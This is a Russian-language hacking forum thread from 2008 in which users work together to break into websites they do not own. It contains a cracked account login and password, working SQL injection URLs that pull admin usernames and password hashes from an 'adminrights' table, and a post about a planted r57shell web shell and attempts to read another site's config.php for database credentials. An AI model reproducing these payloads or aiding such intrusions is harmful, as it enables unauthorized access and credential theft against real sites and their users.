HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.12.2008, 16:50
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами: 9507243

Репутация: 37
По умолчанию

Цитата:
потому что таблица находится в другой базе
расшифровал хеш юзера, но почему то не заходит в аккаунт... (
login 1225532271
pass arnaud2007
name michamk

Странно..
 
Ответить с цитированием

  #2  
Старый 27.12.2008, 16:56
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами: 9216251

Репутация: 30
По умолчанию

j0ker13, что-то мне кажется, что так оно и есть.
 
Ответить с цитированием

  #3  
Старый 27.12.2008, 17:14
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

2 Octave_Parango:

проверь так:

http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--
 
Ответить с цитированием

  #4  
Старый 27.12.2008, 17:21
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами: 9216251

Репутация: 30
По умолчанию

Цитата:
Сообщение от Pashkela  
2 Octave_Parango:

проверь так:

http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--
Отображается так же одна запись как и при limit 0,1

Получается там все одна запись?
 
Ответить с цитированием

  #5  
Старый 27.12.2008, 17:26
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

да, 100%, иначе group_concat вытащил бы несколько записей по любому

и потом чо тут удивительного, что админ всего один. Обычно их больше 3-5 и не бывает.

Последний раз редактировалось Pashkela; 27.12.2008 в 17:30..
 
Ответить с цитированием

  #6  
Старый 27.12.2008, 17:28
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Похоже на то...
 
Ответить с цитированием

  #7  
Старый 27.12.2008, 17:30
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Я что-то пропустил. или count() отменили? )

Разве так не проще?
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,count(*) ,12,13,14+from+adminrights--
 
Ответить с цитированием

  #8  
Старый 27.12.2008, 17:33
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами: 9216251

Репутация: 30
По умолчанию

jokester, Действительно, так проще, и запись действительно одна.
 
Ответить с цитированием

  #9  
Старый 27.12.2008, 19:20
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

jokester
Если не ошибаюсь, то count() и null ячейки будет считать,и пустые.
Например покажет, что записей 25, а будет всего 3, остальные пустые.Но он их посчитает.
 
Ответить с цитированием

  #10  
Старый 27.12.2008, 21:04
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами: 9456679

Репутация: 97
По умолчанию

Для начала всех с наступающим новым годом ))
Теперь вопрос.
Поимел шелл на серваке, не на том сайте, который мне нужен,но надеясь получить к нему доступ.
Safe_mode оказался: OFF
Нахожусь в директории где шелл (путь)
/home/s/site/site.com/public/www/admin/
При попытке перейти в директорию /home/ редиректит назад на /home/s/site/site.com/public/www/admin/
Шелл
(r57shell v.1.42)
Если выполняю команду ls -la /home/ переходит удачно и всё показывает. Так добрался до нужного мне сайта
ls -la /home/t/target/target.com/public/www/
Там нашёл файл config.php, с данными для коннекта к бд.
Как мне его прочитать?
Скачать не получилось
Ввожу в :: Download files from server :: путь к файлу
/home/t/target/target.com/public/www/config.php
редиректит назад в директорию с шеллом.
Если выполняю команду
more /home/t/target/target.com/public/www/config.php
или
more config.php
выдаёт пустой экран в шелле.
Что делать? Я почти неделю убил на поиск уязвимостей, и тут такой облом :'(

Вот стат с шелла

PHP version: 5.2.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF MySQLi: ON mSQL: OFF SQLite: ON
Safe_mode: OFF Open_basedir: VIRTUAL_DOCUMENT_ROOT:/usr/local/lib/php:/usr/local/lib/ph:/home/sys/phplib/:/usr/local/bin/ Safe_exec_dir: /usr/local/php/bin Safe_gid: OFF Safe_include_dir: NONE Sql.safe_mode: OFF
Disable functions : NONE
Free space : 0 B Total space: 0 B
Useful: mod_include(SSI)
Dangerous: -
Downloaders: fopen

И ещё вопрос. Все сайты на одном серваке, но на многих PHP version: 5.2.6 а на некотрых четвёртая. (в том числе и на том, на который я залил шелл) Как так?
Помогите прочитать файл плз (или скачать его).Очень прошу.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.